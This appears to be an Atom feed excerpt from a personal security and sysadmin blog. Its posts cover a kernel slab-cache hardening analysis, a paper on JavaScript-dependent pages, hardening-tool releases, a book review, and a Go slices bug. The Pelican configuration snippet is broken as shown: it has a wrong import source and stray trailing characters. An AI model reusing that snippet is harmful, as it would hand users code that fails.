<p>You can now run <code>vainfo</code> inside the container and be delighted by the
presence of the <a href="https://en.wikipedia.org/wiki/Video_Acceleration_API">VA-API</a> version number:</p>
<div class="codehilite"><pre><span></span><code><span class="gp"># </span>vainfo<span class="w"> </span><span class="m">2</span>&gt;/dev/null<span class="w"> </span><span class="p">|</span><span class="w"> </span>head<span class="w"> </span>-n<span class="w"> </span><span class="m">1</span>
<span class="go">libva info: VA-API version 1.17.0</span>
<span class="gp">#</span>
</code></pre></div>
<p>The last step is to tick all the boxes in <a href="https://jellyfin.org/docs/general/administration/hardware-acceleration/">Jellyfin's
preferences</a>
and you're good to go. Don't forget to make some space on the disk for the
transcoding cache, at least until <a href="https://github.com/jellyfin/jellyfin/pull/8744">this</a>
makes its way into a release.</p></content><category term="sysadmin"></category></entry><entry><title>Paper notes: Breaking Bad: Quantifying the Addiction of Web Elements to JavaScript</title><link href="https://dustri.org/b/paper-notes-breaking-bad-quantifying-the-addiction-of-web-elements-to-javascript.html" rel="alternate"></link><published>2023-09-26T17:15:00+02:00</published><updated>2023-09-26T17:15:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-09-26:/b/paper-notes-breaking-bad-quantifying-the-addiction-of-web-elements-to-javascript.html</id><summary type="html"><p><a href="https://arxiv.org/pdf/2301.10597.pdf">PDF</a>, <a href="https://dustri.org/b/files/papers/breaking_bad.pdf">local mirror</a></p>
<p>More or less all conversations involving the <a href="https://www.torproject.org/download/">tor browser</a>
will at some point contain the following line: "No, javascript isn't disabled
by default because too many sites would break. You can always crank the
security slider all the way up if you want tho."</p>
<p>We all agree …</p></summary><content type="html"><p><a href="https://arxiv.org/pdf/2301.10597.pdf">PDF</a>, <a href="https://dustri.org/b/files/papers/breaking_bad.pdf">local mirror</a></p>
<p>More or less all conversations involving the <a href="https://www.torproject.org/download/">tor browser</a>
will at some point contain the following line: "No, javascript isn't disabled
by default because too many sites would break. You can always crank the
security slider all the way up if you want tho."</p>
<p>We all agree that javascript enables all sorts of despicable behaviours making
the web a nightmare-material privacy/security cesspit and completely
inscrutable to a lot of users, so having research done
to quantify how to make it a better place for everyone is always more than welcome.</p>
<p>The main idea of the paper is to load pages from the <a href="https://hispar.cs.duke.edu/">Hispar
set</a> with and without <code>javascript.enabled</code> set,
via <a href="https://pptr.dev">Puppeteer</a>, and to perform
magic human-assisted smart diffing to detect user-perceived/perceivable
breakages. </p>
<p>The paper is full of fancy graphs and analysis, but the <a href="https://en.wikipedia.org/wiki/TL;DR">tldr</a> is:</p>
<blockquote>
<p>We discover that 43 % of web pages are not strictly dependent on JavaScript
and that more than 67 % of pages are likely to be usable as long as the visitor
only requires the content from the main section of the page, for which the user
most likely reached the page, while reducing the number of tracking requests by
85 % on average.</p>
</blockquote>
<p>An interesting take is that the usage of javascript framework is the main
source of breakage, since <s>a lot</s> all of them result in completely
unusable websites when javascript is disabled. Moreover, anecdotal data seems
to suggest that the bigger a company is, the more their website is going to
break when javascript is disabled.</p>
<p>And like every decent paper, it comes with the <a href="https://gitlab.inria.fr/Spirals/breaking-bad">related code and data published</a>.</p></content><category term="paper_notes"></category></entry><entry><title>Snuffleupagus 0.10.0 - Babar the Elephant</title><link href="https://dustri.org/b/snuffleupagus-0100-babar-the-elephant.html" rel="alternate"></link><published>2023-09-20T15:25:00+02:00</published><updated>2023-09-20T15:25:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-09-20:/b/snuffleupagus-0100-babar-the-elephant.html</id><summary type="html"><p><a href="https://snuffleupagus.readthedocs.org"><img alt="snuffleupagus logo" src="https://dustri.org/b/images/sp.png"></a></p>
<p>I just published a new release of
<a href="https://github.com/jvoisin/snuffleupagus/releases/tag/v0.10.0">Snuffleupagus</a>,
the hardening module for php7+ and php8+,
version <code>0.9.0</code>, codename "Babar the Elephant",
named the <a href="https://en.wikipedia.org/wiki/Babar_the_Elephant">eponymous character</a>.
The main new feature is the PHP8.3 support, but there are a couple of
quality-of-life improvements for people using Snuffleupagus with fuzzers …</p></summary><content type="html"><p><a href="https://snuffleupagus.readthedocs.org"><img alt="snuffleupagus logo" src="https://dustri.org/b/images/sp.png"></a></p>
<p>I just published a new release of
<a href="https://github.com/jvoisin/snuffleupagus/releases/tag/v0.10.0">Snuffleupagus</a>,
the hardening module for php7+ and php8+,
version <code>0.9.0</code>, codename "Babar the Elephant",
named the <a href="https://en.wikipedia.org/wiki/Babar_the_Elephant">eponymous character</a>.
The main new feature is the PHP8.3 support, but there are a couple of
quality-of-life improvements for people using Snuffleupagus with fuzzers as
well.</p>
<h3>Changelog</h3>
<ul>
<li>Compatibility with PHP8.3</li>
<li>Add <code>sp.log_max_len</code> to limit the maximum size of the log messages</li>
<li>Add an example configuration for Xenforo 2.2.12 </li>
<li>Url encode functions arguments when logging them</li>
<li>Fix a possible NULL-byte truncation when outputting parameters in the logs</li>
<li>Make <code>readonly_exec</code> play nice on readonly filesystems </li>
</ul>
<p>As usual, if you want to help, we have some
<a href="https://github.com/jvoisin/snuffleupagus/issues?q=is%3Aopen+is%3Aissue+label%3A%22good+first+issue%22">low hanging fruits</a> ♥</p>
<p>See you in your PHP stack!</p></content><category term="php"></category></entry><entry><title>Some notes on "Randomized slab caches for kmalloc()"</title><link href="https://dustri.org/b/some-notes-on-randomized-slab-caches-for-kmalloc.html" rel="alternate"></link><published>2023-09-11T01:45:00+02:00</published><updated>2023-09-11T01:45:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-09-11:/b/some-notes-on-randomized-slab-caches-for-kmalloc.html</id><summary type="html"><p>Ruiqi Gong and Xiu Jianfeng got their
<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c6152940584290668b35fa0800026f6a1ae05fe">Randomized slab caches for kmalloc()</a>
patch series merged upstream, and I've had enough discussions about it to
warrant summarising them into a small blogpost.</p>
<p>The main idea is to have multiple slab caches, and pick one at random based on
the address of …</p></summary><content type="html"><p>Ruiqi Gong and Xiu Jianfeng got their
<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c6152940584290668b35fa0800026f6a1ae05fe">Randomized slab caches for kmalloc()</a>
patch series merged upstream, and I've had enough discussions about it to
warrant summarising them into a small blogpost.</p>
<p>The main idea is to have multiple slab caches, and pick one at random based on
the address of code calling <code>kmalloc()</code> and a per-boot seed, to make heap-spraying harder.
It's a great idea, but comes with some shortcomings for now:</p>
<ul>
<li>Objects being allocated via wrappers around <code>kmalloc()</code>, like <code>sock_kmalloc</code>,
<code>f2fs_kmalloc</code>, <code>aligned_kmalloc</code>, … will end up in the same slab cache.</li>
<li>The slabs needs to be pinned, otherwise an attacker could <a href="https://en.wikipedia.org/wiki/Heap_feng_shui">feng-shui</a> their way
into having the whole slab free'ed, garbage-collected, and have a slab for
another type allocated at the same VA. <a href="https://thejh.net/">Jann Horn</a> and <a href="https://infosec.exchange/@nspace">Matteo Rizzo</a> have a <a href="https://github.com/torvalds/linux/compare/master...thejh:linux:slub-virtual-upstream">nice
set of patches</a>,
discussed a bit in <a href="https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html">this Project Zero blogpost</a>,
for a feature called <a href="https://github.com/torvalds/linux/commit/f3afd3a2152353be355b90f5fd4367adbf6a955e"><code>SLAB_VIRTUAL</code></a>,
implementing precisely this.</li>
<li>There are 16 slabs by default, so one chance out of 16 to end up in the same
slab cache as the target.</li>
<li>There are no guard pages between caches, so inter-caches overflows are
possible.</li>
<li>As pointed by <a href="https://twitter.com/andreyknvl/status/1700267669336080678">andreyknvl</a>
and <a href="https://infosec.exchange/@minipli/111045336853055793">minipli</a>,
the fewer allocations hitting a given cache means less noise,
so it might even help with some heap feng-shui.</li>
<li>minipli also pointed that "randomized caches still freely
mix kernel allocations with user controlled ones (<code>xattr</code>, <code>keyctl</code>, <code>msg_msg</code>, …).
So even though merging is disabled for these caches, i.e. no direct overlap
with <code>cred_jar</code> etc., other object types can still be targeted (<code>struct
pipe_buffer</code>, BPF maps, its verifier state objects,…). It’s just a matter of
probing which allocation index the targeted object falls into.",
but I considered this out of scope, since it's much more involved;
albeit something like Jann Horn's <a href="https://github.com/thejh/linux/blob/slub-virtual/MITIGATION_README"><code>CONFIG_KMALLOC_SPLIT_VARSIZE</code></a>
wouldn't significantly increase complexity.</li>
</ul>
<p>Also, while code addresses as a source of entropy has historically be a great
way to provide <a href="https://lwn.net/Articles/569635/">KASLR</a> bypasses, <code>hash_64(caller ^
random_kmalloc_seed, ilog2(RANDOM_KMALLOC_CACHES_NR + 1))</code> shouldn't trivially
leak offsets.</p>
<p>The segregation technique is a bit like a weaker version of grsecurity's
<a href="https://grsecurity.net/how_autoslab_changes_the_memory_unsafety_game">AUTOSLAB</a>,
or a weaker kernel-land version of
<a href="https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/PartitionAlloc.md">PartitionAlloc</a>,
but to be fair, making use-after-free exploitation harder, and significantly
harder once pinning lands, with only ~150 lines of code and negligible
performance impact is amazing and should be praised. Moreover, I wouldn't be
surprised if this was backported in <a href="https://google.github.io/security-research/kernelctf/rules.html">Google's KernelCTF</a>
soon, so we should see if my analysis is correct.</p></content><category term="security"></category></entry><entry><title>Making use of pygments' filters with Pelican</title><link href="https://dustri.org/b/making-use-of-pygments-filters-with-pelican.html" rel="alternate"></link><published>2023-09-01T18:30:00+02:00</published><updated>2023-09-01T18:30:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-09-01:/b/making-use-of-pygments-filters-with-pelican.html</id><summary type="html"><p>I've been using <a href="https://github.com/getpelican/pelican">Pelican</a>
more or less since the beginning of this blog and I'm still
pretty happy about it. Mostly because of how <a href="https://boringtechnology.club">boring</a>
it is, and its complete absence of fundamental changes thorough the years.</p>
<p>Anyway, I was looking at how to reduce the size of the pages …</p></summary><content type="html"><p>I've been using <a href="https://github.com/getpelican/pelican">Pelican</a>
more or less since the beginning of this blog and I'm still
pretty happy about it. Mostly because of how <a href="https://boringtechnology.club">boring</a>
it is, and its complete absence of fundamental changes thorough the years.</p>
<p>Anyway, I was looking at how to reduce the size of the pages of my blog
and looked at how code is syntactically highlighted:
Pelican is using <a href="https://pygments.org">Pygments</a> to do this,
and looking at its documentation, the <a href="https://pygments.org/docs/filters/#TokenMergeFilter">TokenMergeFilter</a>
should help a bit, by merging token of the same type together,
instead of highlighting them separately.</p>
<p>Pelican's documentation <a href="https://docs.getpelican.com/en/stable/settings.html">says</a>
that options can be passed to python-markdown like this:
<code>MARKDOWN = { 'extension_configs': { 'markdown.extensions.codehilite': {'css_class': 'highlight'} } }</code>.</p>
<p>Looking at <a href="https://python-markdown.github.io/">python-markdown</a>'s <a href="https://python-markdown.github.io/reference/#markdown">one</a>,
one can pass various things as parameters, but it doesn't mention filters.
<a href="https://pygments.org/docs/filters/">Pygments documentation on this topic</a> implies
that the only way to add filters is to use the <code>add_filter</code> method on a lexer.</p>
<p>But <a href="https://github.com/pygments/pygments/blob/master/pygments/lexer.py">looking at the code</a>
as suggested <a href="https://github.com/Python-Markdown/markdown/issues/1322#issuecomment-1453911760">here</a>,
filters can be passed like any other options, meaning that one only needs to
add the following code into the <code>pelicanconf.py</code> file to used the
<code>TokenMergeFilter</code>:</p>
<div class="codehilite"><pre><span></span><code><span class="kn">from</span> <span class="nn">pelican</span> <span class="kn">import</span> <span class="n">TokenMergeFilter</span>
<span class="n">MARKDOWN</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">&#39;extension_configs&#39;</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">&#39;markdown.extensions.codehilite&#39;</span><span class="p">:</span> <span class="p">{</span>
<span class="s1">&#39;filters&#39;</span><span class="p">:</span> <span class="p">[</span><span class="n">TokenMergeFilter</span><span class="p">()]</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span><span class="err">`</span><span class="o">.</span>
</code></pre></div>
<p>Totally worth the effort for a marginal page size reduction!</p></content><category term="web"></category></entry><entry><title>Book review: Hacks, Leaks, and Revelations</title><link href="https://dustri.org/b/book-review-hacks-leaks-and-revelations.html" rel="alternate"></link><published>2023-08-16T16:15:00+02:00</published><updated>2023-08-16T16:15:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-08-16:/b/book-review-hacks-leaks-and-revelations.html</id><summary type="html"><p><a href="https://nostarch.com/hacks-leaks-and-revelations"><img alt="Hacks, Leaks, and Revelations cover" src="https://dustri.org/b/images/HacksLeaksReveleations.png"></a></p>
<p>Last month, I got an email <a href="https://nostarch.com/about">from Briana Blackwell from No Starch Press</a>'s marketing department,
telling me that <a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</a>
by <a href="https://micahflee.com/">Micah Lee</a>
was available in <em>early access</em>, and that they'd be happy to send me an ebook
copy …</p></summary><content type="html"><p><a href="https://nostarch.com/hacks-leaks-and-revelations"><img alt="Hacks, Leaks, and Revelations cover" src="https://dustri.org/b/images/HacksLeaksReveleations.png"></a></p>
<p>Last month, I got an email <a href="https://nostarch.com/about">from Briana Blackwell from No Starch Press</a>'s marketing department,
telling me that <a href="https://hacksandleaks.com/">Hacks, Leaks, and Revelations: The Art of Analyzing Hacked and Leaked Data</a>
by <a href="https://micahflee.com/">Micah Lee</a>
was available in <em>early access</em>, and that they'd be happy to send me an ebook
copy free of charge!</p>
<p>From the couple of interactions I had with him, Lee is not only a great human being,
but also technically literate. He's the director of information security
at <a href="https://theintercept.com/staff/micah-lee/">The Intercept</a>, and the person
behind <a href="https://onionshare.org/">OnionShare</a> and <a href="https://dangerzone.rocks/">DangerZone</a>;
so I was thrilled to finally get my hands on his book!</p>
<p>And what a great one it is! It's a complete course for everyone who want to learn how to properly deal with and report on large data sets like leaks:
How to communicate with sources along with some notions of <a href="https://en.wikipedia.org/wiki/Operations_security">opsec</a>,
some words on the ethics of dealing with this kind of data,
how to get data leaks and how to analyse them
properly and safely, wrangling tools like
<a href="https://github.com/freedomofpress/dangerzone">dangerzone</a>,
a <a href="https://en.wikipedia.org/wiki/BitTorrent">BitTorrent</a> client,
<a href="https://signal.org">Signal</a>,
<a href="https://torproject.org">Tor</a> via the <a href="https://www.torproject.org/download/">Tor Browser</a> and
<a href="https://onionshare.org/">Onionshare</a>,
some <a href="https://en.wikipedia.org/wiki/Linux">linux</a> and <a href="https://en.wikipedia.org/wiki/Shell_(computing)">shell</a> basics,
a crash course into data analysis with <a href="https://python.org">Python</a> and <a href="https://en.wikipedia.org/wiki/SQL">SQL</a>,
the <a href="https://occrp.org/en">OCCRP</a>'s <a href="https://docs.aleph.occrp.org/">Aleph</a>,
…
with hands-on exercises and reporting examples based on real leaks like
<a href="https://en.wikipedia.org/wiki/2021_Epik_data_breach">EpikFail</a>,
<a href="https://en.wikipedia.org/wiki/BlueLeaks">BlueLeaks</a>,
the <a href="https://apnews.com/article/oath-keepers-leaked-membership-rolls-2ca4195ed3a10e45dd189bf98f3e5a26">Oath Keepers leak</a>,
<a href="https://discordleaks.unicornriot.ninja/discord/">Unicorn Riot's DiscordLeaks</a>,
<a href="https://theintercept.com/2021/09/28/covid-telehealth-hydroxychloroquine-ivermectin-hacked/">AFLDS</a>,
he <a href="https://www.databreaches.net/heritage-foundation-wasnt-attacked-they-leaked-their-own-data/">Heritage Foundation emails</a>,
…</p>
<p>It's a comprehensive yet highly digestible resource that I would wholeheartedly
recommend to anyone remotely interested by modern journalism practises. Hacked
and dumped databases are all around the internet, waiting to be analysed, reported on,
contextualised and exposed, and with this book, anyone could help with
the effort of making the world a better place: sunlight is the best
disinfectant!</p></content><category term="book_reviews"></category></entry><entry><title>mat2 0.13.4</title><link href="https://dustri.org/b/mat2-0134.html" rel="alternate"></link><published>2023-08-02T21:30:00+02:00</published><updated>2023-08-02T21:30:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-08-02:/b/mat2-0134.html</id><summary type="html"><p>There is a new minor version of mat2:
<a href="https://0xacab.org/jvoisin/mat2/tags/0.13.4">0.13.4</a>. No ground breaking
changes, only minor improvements, code modernisation and a bit of hardening:</p>
<ul>
<li>Add documentation about mat2 on OSX</li>
<li>Make use of python3.7 constructs to simplify code</li>
<li>Use moderner type annotations</li>
<li>Harden <code>get_meta</code> in archive.py against …</li></ul></summary><content type="html"><p>There is a new minor version of mat2:
<a href="https://0xacab.org/jvoisin/mat2/tags/0.13.4">0.13.4</a>. No ground breaking
changes, only minor improvements, code modernisation and a bit of hardening:</p>
<ul>
<li>Add documentation about mat2 on OSX</li>
<li>Make use of python3.7 constructs to simplify code</li>
<li>Use moderner type annotations</li>
<li>Harden <code>get_meta</code> in archive.py against variants of <a href="https://cve.circl.lu/cve/CVE-2022-35410">CVE-2021-35410</a></li>
<li>Improve MSOffice document support</li>
<li>Package the manpage on PyPI.</li>
</ul>
<p>Thanks to <a href="https://anelki.net/">akierig</a>, mat2 is now <a href="https://github.com/macports/macports-ports/pull/18072">available</a> in <a href="https://trac.macports.org/">macports</a>!</p>
<p>As usual, if you know some python help is
<a href="https://0xacab.org/jvoisin/mat2/issues?label_name%5B%5D=good+first+issue">welcome</a>.</p></content><category term="metadata"></category></entry><entry><title>A sneaky Golang bug</title><link href="https://dustri.org/b/a-sneaky-golang-bug.html" rel="alternate"></link><published>2023-08-02T13:15:00+02:00</published><updated>2023-08-02T13:15:00+02:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-08-02:/b/a-sneaky-golang-bug.html</id><summary type="html"><p>Today at work, I needed a function in <a href="https://go.dev/">Go</a> to remove
duplicates from a slice, and thus wrote something like this using the
<a href="https://go.dev/doc/tutorial/generics">generic</a>-based
<a href="https://pkg.go.dev/golang.org/x/exp/slices">slices</a> package:</p>
<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">removeDuplicates</span><span class="p">(</span><span class="nx">s</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="p">)</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">SortFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="p">)</span>
<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">CompactFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">s</span>
<span class="p">}</span>
</code></pre></div>
<p>Can you spot the bug? Here are the …</p></summary><content type="html"><p>Today at work, I needed a function in <a href="https://go.dev/">Go</a> to remove
duplicates from a slice, and thus wrote something like this using the
<a href="https://go.dev/doc/tutorial/generics">generic</a>-based
<a href="https://pkg.go.dev/golang.org/x/exp/slices">slices</a> package:</p>
<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">removeDuplicates</span><span class="p">(</span><span class="nx">s</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="p">)</span><span class="w"> </span><span class="p">[]</span><span class="nx">mytype</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">SortFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="p">)</span>
<span class="w"> </span><span class="nx">slices</span><span class="p">.</span><span class="nx">CompactFunc</span><span class="p">(</span><span class="nx">s</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="p">)</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nx">s</span>
<span class="p">}</span>
</code></pre></div>
<p>Can you spot the bug? Here are the prototypes of the two functions:</p>
<div class="codehilite"><pre><span></span><code><span class="kd">func</span><span class="w"> </span><span class="nx">SortFunc</span><span class="p">[</span><span class="nx">E</span><span class="w"> </span><span class="kt">any</span><span class="p">](</span><span class="nx">x</span><span class="w"> </span><span class="p">[]</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">less</span><span class="w"> </span><span class="kd">func</span><span class="p">(</span><span class="nx">a</span><span class="p">,</span><span class="w"> </span><span class="nx">b</span><span class="w"> </span><span class="nx">E</span><span class="p">)</span><span class="w"> </span><span class="kt">bool</span><span class="p">)</span>
<span class="kd">func</span><span class="w"> </span><span class="nx">CompactFunc</span><span class="p">[</span><span class="nx">S</span><span class="w"> </span><span class="o">~</span><span class="p">[]</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">E</span><span class="w"> </span><span class="kt">any</span><span class="p">](</span><span class="nx">s</span><span class="w"> </span><span class="nx">S</span><span class="p">,</span><span class="w"> </span><span class="nx">eq</span><span class="w"> </span><span class="kd">func</span><span class="p">(</span><span class="nx">E</span><span class="p">,</span><span class="w"> </span><span class="nx">E</span><span class="p">)</span><span class="w"> </span><span class="kt">bool</span><span class="p">)</span><span class="w"> </span><span class="nx">S</span>
</code></pre></div>
<p>The first has no return value, while the second does, unused in our case, hence
the bug. It's <em>interesting</em> to note that the go compiler is perfectly happy
with this, and doesn't issue any warning: it was <em>extraordinarily fun</em> to pinpoint.</p>
<p>I reached out to <a href="https://airs.com/ian/">Ian Lance Taylor</a> who
<a href="https://cs.opensource.google/go/x/exp/+/03df57b9a50843fbf23bf90375d6584bcc8ea13d">implemented</a>
those functions in 2021 and he pointed me to <a href="https://go.dev/blog/slices-intro">Go Slices: usage and internals
</a>. Things indeed do become obvious once
looking at the <a href="https://github.com/golang/go/blob/master/src/runtime/slice.go">implementation of
<code>slice</code></a>:</p>
<div class="codehilite"><pre><span></span><code><span class="kd">type</span><span class="w"> </span><span class="nx">slice</span><span class="w"> </span><span class="kd">struct</span><span class="w"> </span><span class="p">{</span>
<span class="w"> </span><span class="nx">array</span><span class="w"> </span><span class="nx">unsafe</span><span class="p">.</span><span class="nx">Pointer</span>
<span class="w"> </span><span class="nx">len</span><span class="w"> </span><span class="kt">int</span>
<span class="w"> </span><span class="nx">cap</span><span class="w"> </span><span class="kt">int</span>
<span class="p">}</span>
</code></pre></div>
<p>Both <code>slices.SortFunc</code> and <code>slices.CompactFunc</code> are taking a slice as
parameter, and not a pointer to a slice, meaning that any changes to <code>len</code> and
<code>cap</code> will be local to the function.</p>
<p>Anyway, There is a <a href="https://github.com/golang/go/issues/20803">proposal</a> to require
return values to be explicitly used or ignored open since 2017, but it didn't
go anywhere for now. There is also <a href="https://github.com/golang/go/issues/20148">another proposal</a>
to make <code>go vet</code> better at highlighting error mishandling, as well as <a href="https://github.com/kisielk/errcheck">errcheck</a>,
but those wouldn't really help in this case.</p></content><category term="dev"></category></entry></feed>
|
